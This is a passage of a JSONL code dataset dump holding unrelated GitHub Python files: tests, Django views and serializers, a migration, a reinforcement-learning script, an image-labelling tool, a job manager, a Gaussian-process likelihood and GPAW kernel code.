index=pd.date_range(start=\"2021-01-02\", periods=len(data), freq=\"1D\"),\n columns=[\"lacolumn\"],\n )\n else:\n return None\n\n\ndef data_generation(\n module: str, status: bool, length: int\n) -> Tuple[pd.DataFrame, pd.DataFrame]:\n label = np.array([False] * length).reshape(-1, 1)\n ori_data = np.ones((length, 1))\n if module == \"transient\":\n label[50:60, 0] = True\n if status:\n label[62, 0] = True\n else:\n label[63, 0] = True\n elif module == \"continuous\":\n label[58, 0] = True\n if status:\n label[70, 0] = True\n else:\n label[63, 0] = True\n\n return pandas_wrap(ori_data, data_type=\"ori_data\"), pandas_wrap(\n label, data_type=\"detect_result\"\n )\n\n\n@pytest.mark.usefixtures(\"env_ready\")\nclass TestSuppressor:\n @pytest.fixture()\n def env_ready(self):\n self.tear_up()\n yield\n self.tear_down()\n\n def tear_up(self):\n pass\n\n def tear_down(self):\n clear_cache()\n\n @pytest.mark.parametrize(\"module\", suppress_module)\n @pytest.mark.parametrize(\"if_anomaly_bool\", if_anomaly)\n def test_suppress(self, module, if_anomaly_bool):\n suppressor_name = {\n \"transient\": \"TransientAnomalySuppressor\",\n \"continuous\": \"ContinuousAnomalySuppressor\",\n }\n cache_length = {\"transient\": 1, \"continuous\": 1}\n cache = CacheSet().get_cache(con.SUPPRESS_CACHE)\n data, detect_results = data_generation(module, if_anomaly_bool, 100)\n suppressor = SuppressorPipeline(name=\"Gemini\", params=params.get(module))\n _ = suppressor.suppress(\n {con.LABEL: detect_results.iloc[:30, :], con.ORIGIN: data.iloc[:30, :]}\n )\n _ = suppressor.suppress(\n {con.LABEL: detect_results.iloc[30:60, :], con.ORIGIN: data.iloc[30:60, :]}\n )\n print(f'result: {\"Gemini\" + suppressor_name.get(module) + \"lacolumn\"}')\n\n cache_result = [col for col in cache.keys() if str(col).startswith(\"Gemini\")]\n assert len(cache_result) == cache_length.get(module)\n detect_results = suppressor.suppress(\n {con.LABEL: detect_results.iloc[60:, :], con.ORIGIN: data.iloc[60:, :]}\n )\n print(f\"detect_result: {detect_results}\")\n print(f\"SuppressCache: {CacheSet().get_cache(con.SUPPRESS_CACHE)._cache}\")\n assert sum(detect_results.get(con.LABEL).iloc[:, 0]) == result.get(module).get(\n if_anomaly_bool\n )\n","repo_name":"openGemini/openGemini-castor","sub_path":"tests/suppressor/test_suppressor_cache.py","file_name":"test_suppressor_cache.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"36"} +{"seq_id":"38915897410","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .forms import UserCreationForm,editarperrfilform\n\ndef registro(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('shop:product_list')\n else:\n form = UserCreationForm()\n return render(request,'registration/registro.html',{'form':form})\n\n@login_required\ndef editarperfil(request):\n user = request.user\n if request.method == 'POST':\n form = editarperrfilform(request.POST, instance=user)\n if form.is_valid():\n form.save()\n return redirect('shop:product_list')\n else:\n form = editarperrfilform(instance=user)\n return render(request, 'registration/editar_perfil.html', {'form': form})\n","repo_name":"zk-error/myshop","sub_path":"cuentas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"20885255117","text":"import sys, json, re, os\nHOME=os.path.expanduser(\"~\")\nsys.path.append(os.path.join(HOME, 'lmfdb'))\n\nfh=open(\"grdata.out\")\nfrom lmfdb import db\n\nadict = {}\n\nadictaut = {}\n\nfor fn in [\"grdata.out\", \"grdata_aut.out\"]:\n print (\"Reading \"+fn)\n fh=open(fn)\n for line in fh.readlines():\n line.strip()\n if re.match(r'\\S', line):\n line = line.replace(r\"'\", r'\"')\n l = json.loads(line)\n ambient = l[0]\n final=l[1]\n for a in final:\n full_label = \"%s.%s\"%(ambient, a[0])\n if fn == \"grdata.out\":\n adict[full_label] = int(round(a[1]))\n else:\n adictaut[full_label] = int(round(a[1]))\n #print ({'label': '%s.%s'%(lab, a[0])}, {'diagram_x': a[1]})\n #db.gps_subgroups.upsert({'label': '%s'%(a[0])}, {'diagram_x': int(round(a[1]))})\n fh.close()\n\n\n#for a in final:\n# db.gps_subgroups.upsert({'label': '%s.%s'%(gp, a[0])}, {'diagram_x': a[1]})\n\ndef modif(ent):\n global adict\n lab = ent['label']\n if lab in adict:\n ent['diagram_x'] = adict[lab]\n if lab in adictaut:\n ent['diagram_aut_x'] = adictaut[lab]\n return ent\n\ndb.gps_subgroups.rewrite(modif)\n\n","repo_name":"roed314/FiniteGroups","sub_path":"Code/LMFDB/grfinish.py","file_name":"grfinish.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"13271035173","text":"from rest_framework import serializers\nfrom snippets.models import Snippet, CourseList, CoursePage\nfrom django.contrib.auth.models import User, Group\nfrom django.core.mail import send_mail\nfrom tutorial.settings import BASE_URL\nfrom utils.token_generator import token_generator, create_email_confirm_url\n\n# class SnippetSerializer(serializers.ModelSerializer):\nclass SnippetSerializer(serializers.HyperlinkedModelSerializer):\n # highlight = serializers.HyperlinkedIdentityField(view_name='snippet-highlight', format='html')\n class Meta:\n model = Snippet\n # fields = ('id', 'title', 'code', 'linenos', 'language', 'style', 'owner')\n fields = ('url', 'id', 'title', 'owner')\n\n\nclass CreateSnippetSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n # highlight = serializers.HyperlinkedIdentityField(view_name='snippet-highlight', format='html')\n\n class Meta:\n model = Snippet\n fields = (\n 'url', 'id', 'title', 'code', 'linenos', 'language',\n 'style', 'owner', 'perm_list'\n )\n\n\n# class UserSerializer(serializers.ModelSerializer):\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n # snippets = serializers.PrimaryKeyRelatedField(many=True, queryset=Snippet.objects.all())\n snippets = serializers.HyperlinkedRelatedField(\n many=True, view_name='snippet-detail',\n read_only=True\n )\n\n class Meta:\n model = User\n fields = ('id', 'username', 'snippets')\n\n\nclass UserCreateSerializer(serializers.ModelSerializer):\n password = serializers.CharField(write_only=True)\n\n def create(self, validated_data):\n user = User.objects.create(\n username=validated_data['username'],\n is_active = False,\n email = validated_data['email']\n )\n print('SOMEPRINT',validated_data)\n print('SOMEPRINT')\n token = token_generator.make_token(user)\n url = create_email_confirm_url(user.id, token)\n print('SOMEPRINT', url)\n # ~ send_mail(\n # ~ 'Activation on Django', url, 'djangodev108@gmail.com',\n # ~ [validated_data['email']], fail_silently=False\n # ~ )\n user.set_password(validated_data['password'])\n user.groups.add(1)\n user.save()\n if User.objects.filter(username=self.validated_data['username']).exists():\n send_mail(\n 'Activation on Django', url, 'djangodev108@gmail.com',\n [validated_data['email']], fail_silently=False\n )\n else:\n print('SOMEPRINT wrong')\n return user\n\n class Meta:\n model = User\n fields = (\n 'id', 'username', 'password', 'email', 'first_name',\n 'last_name',\n )\n\n\nclass CreateCourseSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n\n class Meta:\n model = CourseList\n fields = ('title', 'descrpt', 'owner')\n\n\nclass CreateCoursePageSerializer(serializers.ModelSerializer):\n class Meta:\n model = CoursePage\n fields = ('course', 'snippet', 'order', 'dtm')\n\n\nclass CourseListSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = CourseList\n fields = ('url', 'id', 'title', 'descrpt', 'owner')\n\n\nclass CoursePageSerializer(serializers.HyperlinkedModelSerializer):\n # snippet = serializers.HyperlinkedRelatedField(many=False, view_name='snippet-detail', read_only=True)\n title = serializers.ReadOnlyField(source='snippet.title')\n class Meta:\n model = CoursePage\n fields = ('order', 'title', 'dtm','snippet')\n\n\nclass CourseDetailSerializer(serializers.HyperlinkedModelSerializer):\n # pages = serializers.StringRelatedField(many=True)\n # pages_listing = serializers.HyperlinkedIdentityField(view_name='coursepage-list')\n pages = CoursePageSerializer(many=True, read_only=True)\n # ~ pages = serializers.HyperlinkedRelatedField(\n # ~ many=True,\n # ~ view_name='coursepage-detail',\n # ~ read_only=True\n # ~ )\n\n class Meta:\n model = CourseList\n fields = ('title', 'descrpt', 'pages')\n\n\nclass CourseDetailPageSerializer(serializers.HyperlinkedModelSerializer):\n # pages = serializers.HyperlinkedRelatedField(many=True, view_name='snippet-detail', read_only=True)\n title = serializers.ReadOnlyField(source='snippet.title')\n\n class Meta:\n model = CoursePage\nfields = ('title', 'order', 'dtm', 'snippet')\n","repo_name":"Serq108/DZ10","sub_path":"snippets/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28072424022","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lesson', '0001_initial'),\n ('word', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Exam',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('date', models.DateTimeField(default=django.utils.timezone.now)),\n ('lesson_user', models.ForeignKey(related_name='exam', to='lesson.LessonUser')),\n ],\n ),\n migrations.AddField(\n model_name='answer',\n name='exam',\n field=models.ForeignKey(related_name='answer', to='exam.Exam'),\n ),\n migrations.AddField(\n model_name='answer',\n name='question',\n field=models.ForeignKey(related_name='answers', to='word.Question'),\n ),\n ]\n","repo_name":"huyquyet/projectLearn","sub_path":"exam/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35815255363","text":"import torch\nimport math\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom agents.policy_gradient import PGAgent\nimport gymnasium as gym\n\ndef visualize_in_gym(agent, env_name = \"\", inp_env = None, steps=100):\n \"\"\"\n render a environment and visualize it running N steps\n\n another possible solution can be gymnasium.experimental.wrappers.RecordVideoV0\n\n or gymnasium.utils.save_video.save_video?\n \"\"\"\n if inp_env:\n demo_env = inp_env\n else:\n demo_env = gym.make(env_name, render_mode = \"human\")\n observation, info = demo_env.reset()\n\n for _ in range(steps):\n action = agent.get_action(torch.from_numpy(observation)) # agent policy that uses the observation and info\n # insert an algorithm that can interact with env and output an action here\n observation, reward, terminated, truncated, _ = demo_env.step(action)\n if terminated or truncated:\n observation, info = demo_env.reset()\n\n if not inp_env:\n demo_env.close()\n\nenv = gym.make(\"CartPole-v1\")\n\nagent = PGAgent(4, 2)\n\ndemo_env = gym.make(\"CartPole-v1\", render_mode = \"human\")\n# gym.utils.play.play(demo_env, fps=128)\n\nwriter = SummaryWriter()\n\nDISCOUNTED_FACTOR = 0.9\n\nnum_episodes = 2000\nfor episode in range(num_episodes):\n episode_recorder = []\n observation, info = env.reset()\n done = False\n episode_reward = 0\n while not done:\n action = agent.get_action(torch.from_numpy(observation))\n next_observation, reward, terminated, truncated, _ = env.step(action)\n episode_recorder.append((observation, action, reward, next_observation))\n observation = next_observation\n done = terminated or truncated\n episode_reward += reward\n\n # for observation, action, reward, next_observation in reversed(episode_recorder):\n loss = agent.update(episode_recorder, DISCOUNTED_FACTOR)\n\n writer.add_scalar('Loss', loss, episode)\n writer.add_scalar('Reward', episode_reward, episode)\n if episode % 100 == 0:\n visualize_in_gym(agent, inp_env=demo_env)\n # visualize_in_gym(agent, env_name=\"CartPole-v1\")\n\n\nwriter.flush()\nwriter.close()\n\n\nvisualize_in_gym(agent, inp_env=demo_env)","repo_name":"zhilu1/rl_practice","sub_path":"cart_pole_PG.py","file_name":"cart_pole_PG.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15907813457","text":"#!/usr/bin/env python3\nimport os\nimport pygame\nimport sys\nimport glob\nfrom window import Window\nimport numpy as np\nsys.path.append(os.getcwd())\nfrom viewer import fix\nfrom tqdm import tqdm\nfrom PIL import Image\n\n# to generate:\n# grep -vIr \"\\x00\" -- */*/ent.txt > /tmp/ents\n# cat /tmp/ents | sort -t \":\" -k2 -n -r > /tmp/entssort\n\nBASEDIR = sys.argv[1]\n\nwin = Window(1164, 874)\ncc = 0\n\nif len(sys.argv) > 3:\n mask = sys.argv[3]\nelse:\n mask = \"h%03d\"\n\nwhile len(glob.glob((\"imgs/\"+mask+\"*\") % cc)) > 0:\n cc += 1\nprint(\"starting with %d\" % cc)\n\nseen = set([x.split(\"_\", 1)[1] for x in glob.glob(\"imgs/*\")])\n\n# permanent camera occulusions\nEXCLUDE_USERS = [\"807f77aac0daa4b6\", \"84e6a31bffe59bee\"]\n\nseek_fn = None\n#seek_fn = glob.glob(\"imgs/\"+(mask % (cc-1))+\"*\")[0].split(\"_\", 1)[1]\n#print(seek_fn)\n\no = 2\ndat = open(sys.argv[2]).read().strip().split(\"\\n\")\nfor d in tqdm(dat):\n fn = os.path.join(BASEDIR, d.split(\":\")[0].replace(\"/ent.txt\", \"\"))\n dd = sorted(os.listdir(fn))\n if seek_fn is not None:\n #print(dd[1], seek_fn)\n if not dd[1].endswith(seek_fn):\n continue\n seek_fn = None\n\n if dd[1][5:] in seen:\n continue\n if dd[1].split(\"_\")[1] in EXCLUDE_USERS:\n continue\n print(dd)\n\n ii = np.array(Image.open(os.path.join(fn, dd[1])))\n segi = fix(Image.open(os.path.join(fn, dd[2])))\n while 1:\n pii = ii*((10-o)/10) + segi*(o/10)\n win.draw(pii)\n kk = win.getkey()\n if kk == ord(\"z\"):\n suf = dd[1][5:]\n outn = (\"imgs/\"+mask+\"_%s\") % (cc, suf)\n print(\"saving \", outn)\n im = Image.fromarray(ii)\n im.save(outn)\n im = Image.fromarray(segi)\n im.save(outn.replace(\"imgs/\", \"masks/\"))\n cc += 1\n break\n elif kk == pygame.locals.K_UP:\n o = min(10, o+1)\n elif kk == pygame.locals.K_DOWN:\n o = max(0, o-1)\n elif kk == ord(\" \"):\n break\n\n\n\n","repo_name":"commaai/comma10k","sub_path":"tools/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"36"} +{"seq_id":"1915200176","text":"import numpy as np\nimport pandas as pd \n\n\"\"\"\n Every one of these functions expects a full interval df (so zero and NaN intervals) \n but will only give a predictions for the zero intervals \n\"\"\"\n\ndef sign_change_intervals(interval_df):\n zero_intervals = interval_df.query('interval_value == 0')\n short_zero_intervals = (\n zero_intervals\n .replace({'start':np.nan, 'end': np.nan})\n .dropna(subset = ['0th_value_after_end', 'value_before_start'])\n .query('interval_length == 1')\n )\n sign_change_intervals = np.sign(short_zero_intervals['value_before_start']) == - np.sign(short_zero_intervals['0th_value_after_end'])\n result = pd.Series(index = zero_intervals.index, dtype = 'object')\n \n # a short zero interval with a sign change is normal\n result.loc[sign_change_intervals[sign_change_intervals].index] = False\n \n return result\n \n \ndef low_consumption_on_both_sides_intervals(interval_df): \n zero_intervals = interval_df.query('interval_value == 0')\n short_zero_intervals = (\n zero_intervals\n .replace({'start':np.nan, 'end': np.nan})\n .dropna(subset = ['0th_value_after_end', 'value_before_start'])\n .query('interval_length == 1')\n )\n low_consumption = (np.abs(short_zero_intervals['value_before_start']) < 0.1) & (np.abs(short_zero_intervals['0th_value_after_end']) < 0.1)\n result = pd.Series(index = zero_intervals.index, dtype = 'object')\n \n # a short zero interval with low consumption on both sides is normal\n result.loc[low_consumption[low_consumption].index] = False\n \n return result\n\ndef collective_error_intervals(interval_df, threshold = 2): \n # count how much each start time occurs\n interval_counts = interval_df.reset_index().groupby('start')[['meterID', 'year']].size()\n # add this to the interval df as a column\n intervals_with_count = interval_df.join(interval_counts.to_frame('count'), on = ['start'])\n\n # only use the intervals with a very high count\n intervals_with_count = intervals_with_count[intervals_with_count['count'] >= 33] \n\n # filter each group of intervals that start on the same moment, only allow intervals with the most common length +- a threshold (in this case 2)\n def filter_groups(df): \n most_common_value = df.interval_length.value_counts().idxmax()\n return df[(df.interval_length >= most_common_value -threshold) & (df.interval_length <= most_common_value + threshold) ]\n intervals_with_count = intervals_with_count.groupby('start_time').apply(filter_groups).droplevel(0)\n \n # each of the intervals that remains is thus a collective data problem and is a data error\n collective_data_problems = pd.Series(index = interval_df.index, dtype = 'object')\n collective_data_problems.loc[intervals_with_count.index] = True\n return collective_data_problems\n ","repo_name":"jankrans/Conditional-Generative-Neural-Networks","sub_path":"repositories/profile-clustering/notebooks/real_data_exploration/handling_zeros_and_nans/zero_intervals.py","file_name":"zero_intervals.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30199883148","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: ai ts=4 sts=4 et sw=4 nu\n\"\"\"\n(c) 2015 Ronan Delacroix\nJob Manager Job Abstract Class\n:author: Ronan Delacroix\n\"\"\"\nimport os\nimport logging\nimport mongoengine\nimport mongoengine.signals\nimport tbx\nimport tbx.process\nimport tbx.service\nimport tbx.log\nimport tbx.text\nimport uuid as UUID\nimport traceback\nimport tempfile\nimport shutil\nfrom datetime import datetime, timedelta\nimport jobmanager.common as common\nfrom .host import Host\nfrom tbx.code import cached_property\n\n\njob_status_to_icon = {\n 'new': \"\\u23F8\",\n 'pending': \"\\u23F8\",\n 'running': \"\\u25B6\",\n 'success': \"\\u2605\",\n 'error': \"\\u2716\"\n}\n\n\nclass Job(common.NamedDocument, common.Runnable, common.LogProxy, common.AutoDocumentable):\n\n meta = {\n 'collection': 'jobs',\n 'indexes': [\n 'status',\n 'created',\n ]\n }\n\n status_text = mongoengine.StringField(required=True, default=\"\")\n hostname = mongoengine.StringField()\n completion = mongoengine.IntField(required=True, min_value=0, max_value=100, default=0)\n timeout = mongoengine.IntField(min_value=0, default=43200) # 12 hours\n ttl = mongoengine.IntField(min_value=1, default=1)\n history = mongoengine.ListField(field=mongoengine.DictField(), default=[])\n\n def __str__(self):\n return \"%s %s\" % (self.name, job_status_to_icon.get(self.status, self.status))\n\n @classmethod\n def default_slot_amount(cls):\n \"\"\"\n Returns the default amount of job that can be run at the same time on the same machine/client.\n Override and set to math.inf for no limiting amount.\n You can base that how much CPU cores you have or anything else.\n Default is 1 job at a time by default.\n \"\"\"\n return 1\n\n @cached_property\n def extra_log_arguments(self):\n return {\n 'job_type': self.__class__.__name__,\n 'job_uuid': self.uuid,\n 'job_status': self.status,\n }\n\n def update_status(self, completion=None, text=None):\n if text:\n self.status_text = text\n\n if completion:\n self.completion = completion\n\n log = self.log_info\n if self.status == 'error':\n log = self.log_error\n\n log(\"Progress update : {progress:5.1f}% - {message}\".format(\n progress=self.completion,\n message=self.status_text\n ))\n\n self.update(\n add_to_set__history={'t': datetime.utcnow(), 'm': self.status_text, 'c': self.completion, 's': self.status},\n status=self.status,\n details=self.details,\n completion=self.completion,\n status_text=self.status_text,\n started=self.started,\n finished=self.finished\n )\n\n def update_progress(self, completion, text=None):\n self.update_status(completion=completion, text=text)\n\n def save_as_successful(self, text=\"Job Successful\"):\n self.update_status(100, text=text)\n self.save() # Saves a other fields\n\n def save_as_error(self, text=\"Job Error\"):\n self.status = 'error'\n self.update_status(text=text)\n self.save()\n\n\nmongoengine.signals.pre_save.connect(common.update_modified)\n\n\nclass JobTask(mongoengine.EmbeddedDocument, common.Runnable, common.LogProxy, common.AutoDocumentable):\n meta = {\n 'abstract': True,\n }\n\n status = mongoengine.StringField(required=True, default=\"pending\",\n choices=('new', 'pending', 'running', 'success', 'error'))\n details = mongoengine.StringField(required=False)\n\n @property\n def job(self):\n if isinstance(self._instance, JobTask):\n return self._instance.job\n return self._instance\n\n @cached_property\n def extra_log_arguments(self):\n extra_log_arguments = {}\n if isinstance(self.job, common.LogProxy):\n extra_log_arguments = self.job.extra_log_arguments\n extra_log_arguments['task'] = self.name\n return extra_log_arguments\n\n def __str__(self):\n return \"%s > %s\" % (self.job, self.name)\n\n def get_hash(self):\n import base64\n import hashlib\n return base64.b64encode(\n hashlib.sha1(mongoengine.EmbeddedDocument.to_json(self, sort_keys=True).encode()).digest()).decode().strip('=').replace(\"+\", \"-\")\n\n def update_status(self, completion=None, text=None):\n # TODO : Review this part // Completion between tasks and jobs is not clear.\n if text:\n self.job.status_text = text\n\n if completion:\n self.job.completion = completion\n\n log = self.log_info\n if self.status == 'error':\n log = self.log_error\n\n log(\"Progress update : {progress:5.1f}% - {message}\".format(\n progress=self.job.completion,\n message=text\n ))\n\n self.job.update(\n add_to_set__history={'t': datetime.utcnow(), 'k': self.name, 'm': text, 'c': completion},\n completion=completion,\n status_text=text\n )\n\n def update_progress(self, completion, text=None):\n self.update_status(completion=completion, text=text)\n\n\ndef make_job(job_name, **kwargs):\n \"\"\"\n Decorator to create a Job from a function.\n Give a job name and add extra fields to the job.\n\n @make_job(\"ExecuteDecJob\",\n command=mongoengine.StringField(required=True),\n output=mongoengine.StringField(default=None))\n def execute(job: Job):\n job.log_info('ExecuteJob %s - Executing command...' % job.uuid)\n result = subprocess.run(job.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n job.output = result.stdout.decode('utf-8') + \" \" + result.stderr.decode('utf-8')\n\n \"\"\"\n def wraps(func):\n kwargs['process'] = func\n job = type(job_name, (Job,), kwargs)\n globals()[job_name] = job\n return job\n return wraps\n","repo_name":"ronhanson/python-jobmanager-common","sub_path":"jobmanager/common/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"23702290276","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, unicode_literals\n\n__all__ = [\"GPLikelihood\"]\n\nimport numpy as np\n\ntry:\n import george\nexcept ImportError:\n george = None\nelse:\n from george.kernels import Matern32Kernel\n\nfrom ..pipeline import Pipeline\nfrom ..gp_heuristics import estimate_tau\n\n\nclass GPLikelihood(Pipeline):\n\n query_parameters = dict(\n tau_frac=(0.25, False),\n )\n\n def __init__(self, *args, **kwargs):\n if george is None:\n raise ImportError(\"george is required for the GP model\")\n kwargs[\"cache\"] = kwargs.pop(\"cache\", False)\n super(GPLikelihood, self).__init__(*args, **kwargs)\n\n def get_result(self, query, parent_response):\n lcs = [LCWrapper(lc, tau_frac=query[\"tau_frac\"])\n for lc in parent_response.light_curves]\n return dict(model_light_curves=lcs)\n\n\nclass LCWrapper(object):\n\n def __init__(self, lc, dist_factor=10.0, time_factor=0.1, tau_frac=0.25):\n self.time = lc.time\n mu = np.median(lc.flux)\n self.flux = lc.flux / mu - 1.0\n self.ferr = lc.ferr / mu\n\n # Convert to parts per thousand.\n self.flux *= 1e3\n self.ferr *= 1e3\n\n # Estimate the kernel parameters.\n tau = tau_frac * estimate_tau(self.time, self.flux)\n self.kernel = np.var(self.flux) * Matern32Kernel(tau ** 2)\n self.gp = george.GP(self.kernel, solver=george.HODLRSolver)\n self.K_0 = self.gp.get_matrix(self.time)\n self.gp.compute(self.time, self.ferr, seed=1234)\n self.alpha = self.gp.solver.apply_inverse(self.flux)\n\n # Compute the likelihood of the null model.\n self.ll0 = self.lnlike()\n\n # def lnlike(self, model=None):\n # # No model is given. Just evaluate the lnlikelihood.\n # if model is None:\n # return -0.5 * np.dot(self.flux, self.alpha)\n\n # # A model is given, use it to do a linear fit.\n # m = model(self.time)\n # if m[0] != 0.0 or m[-1] != 0.0 or np.all(m == 0.0):\n # return 0.0, 0.0, 0.0\n\n # # Compute the inverse variance.\n # Cm = self.gp.solver.apply_inverse(m)\n # S = np.dot(m, Cm)\n # if S <= 0.0:\n # return 0.0, 0.0, 0.0\n\n # # Compute the depth.\n # d = np.dot(m, Cf) / S\n # if not np.isfinite(d):\n # return 0.0, 0.0, 0.0\n\n # # Compute the lnlikelihood.\n # dll = -0.5*np.dot(self.flux-d*m, Cf-d*Cm) - self.ll0\n # if not np.isfinite(dll):\n # return 0.0, 0.0, 0.0\n\n # return dll, d, S\n\n # def predict(self, y=None):\n # if y is None:\n # y = self.flux\n # return self.gp.predict(y, self.time, mean_only=True)\n\n def lnlike_eval(self, y):\n return -0.5 * np.dot(y, self.gp.solver.apply_inverse(y))\n\n def lnlike(self, model=None):\n if model is None:\n return -0.5 * np.dot(self.flux, self.alpha)\n\n # Evaluate the transit model.\n m = model(self.time)\n if m[0] != 0.0 or m[-1] != 0.0 or np.all(m == 0.0):\n return 0.0, 0.0, 0.0\n\n Km = self.gp.solver.apply_inverse(m)\n Ky = self.alpha\n ivar = np.dot(m, Km)\n depth = np.dot(m, Ky) / ivar\n r = self.flux - m*depth\n ll = -0.5 * np.dot(r, Ky - depth * Km)\n return ll - self.ll0, depth, ivar\n\n def predict(self, y=None):\n if y is None:\n y = self.flux\n return np.dot(self.K_0, self.gp.solver.apply_inverse(y))\n","repo_name":"dfm/ketu","sub_path":"ketu/kepler/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"36"} +{"seq_id":"37569237521","text":"def absol(x):\n if x>= 0:\n return x\n elif x < 0:\n return -x\n else:\n return 'slutt å tull'\n\ntall = int(input('Hvilket tall vil du ha absoluttverdien til? '))\nprint(f\"Absoluttverdien til {tall} er\", absol(tall))","repo_name":"jorul/ITGK","sub_path":"ITGK øvinger/Øving 5 uke 41/Varierte funksjoner/a absoluttverdi.py","file_name":"a absoluttverdi.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37349149947","text":"\"\"\"XC density kernels for response function calculations.\"\"\"\n\nimport numpy as np\n\nfrom my_gpaw.response.localft import LocalFTCalculator\nfrom my_gpaw.response.fxc_kernels import AdiabaticFXCCalculator\n\n\ndef get_density_xc_kernel(qpd, gs, context, functional='ALDA',\n rshelmax=-1, rshewmin=None,\n chi0_wGG=None):\n \"\"\"Density-density xc kernels.\n Factory function that calls the relevant functions below.\"\"\"\n\n p = context.print\n nspins = len(gs.nt_sR)\n assert nspins == 1\n\n if functional[0] == 'A':\n # Standard adiabatic kernel\n p('Calculating %s kernel' % functional)\n localft_calc = LocalFTCalculator.from_rshe_parameters(\n gs, context, rshelmax=rshelmax, rshewmin=rshewmin)\n fxc_calculator = AdiabaticFXCCalculator(localft_calc)\n fxc_kernel = fxc_calculator(functional, '00', qpd)\n Kxc_GG = fxc_kernel.get_Kxc_GG()\n\n if qpd.kd.gamma:\n Kxc_GG[0, :] = 0.0\n Kxc_GG[:, 0] = 0.0\n Kxc_sGG = np.array([Kxc_GG])\n elif functional[:2] == 'LR':\n p('Calculating LR kernel with alpha = %s' % functional[2:])\n Kxc_sGG = calculate_lr_kernel(qpd, alpha=float(functional[2:]))\n elif functional == 'Bootstrap':\n p('Calculating Bootstrap kernel')\n Kxc_sGG = get_bootstrap_kernel(qpd, chi0_wGG, context)\n else:\n raise ValueError('Invalid functional for the density-density '\n 'xc kernel:', functional)\n\n return Kxc_sGG[0]\n\n\ndef calculate_lr_kernel(qpd, alpha=0.2):\n \"\"\"Long range kernel: fxc = \\alpha / |q+G|^2\"\"\"\n\n assert qpd.kd.gamma\n\n f_G = np.zeros(len(qpd.G2_qG[0]))\n f_G[0] = -alpha\n f_G[1:] = -alpha / qpd.G2_qG[0][1:]\n\n return np.array([np.diag(f_G)])\n\n\ndef get_bootstrap_kernel(qpd, chi0_wGG, context):\n \"\"\" Bootstrap kernel (see below) \"\"\"\n\n if context.comm.rank == 0:\n chi0_GG = chi0_wGG[0]\n if context.comm.size > 1:\n # If size == 1, chi0_GG is not contiguous, and broadcast()\n # will fail in debug mode. So we skip it until someone\n # takes a closer look.\n context.comm.broadcast(chi0_GG, 0)\n else:\n nG = qpd.ngmax\n chi0_GG = np.zeros((nG, nG), complex)\n context.comm.broadcast(chi0_GG, 0)\n\n return calculate_bootstrap_kernel(qpd, chi0_GG, context)\n\n\ndef calculate_bootstrap_kernel(qpd, chi0_GG, context):\n \"\"\"Bootstrap kernel PRL 107, 186401\"\"\"\n p = context.print\n\n if qpd.kd.gamma:\n v_G = np.zeros(len(qpd.G2_qG[0]))\n v_G[0] = 4 * np.pi\n v_G[1:] = 4 * np.pi / qpd.G2_qG[0][1:]\n else:\n v_G = 4 * np.pi / qpd.G2_qG[0]\n\n nG = len(v_G)\n K_GG = np.diag(v_G)\n\n Kxc_GG = np.zeros((nG, nG), dtype=complex)\n dminv_GG = np.zeros((nG, nG), dtype=complex)\n\n for iscf in range(120):\n dminvold_GG = dminv_GG.copy()\n Kxc_GG = K_GG + Kxc_GG\n\n chi_GG = np.dot(np.linalg.inv(np.eye(nG, nG)\n - np.dot(chi0_GG, Kxc_GG)), chi0_GG)\n dminv_GG = np.eye(nG, nG) + np.dot(K_GG, chi_GG)\n\n alpha = dminv_GG[0, 0] / (K_GG[0, 0] * chi0_GG[0, 0])\n Kxc_GG = alpha * K_GG\n p(iscf, 'alpha =', alpha, flush=False)\n error = np.abs(dminvold_GG - dminv_GG).sum()\n if np.sum(error) < 0.1:\n p('Self consistent fxc finished in %d iterations !' % iscf)\n break\n if iscf > 100:\n p('Too many fxc scf steps !')\n\n return 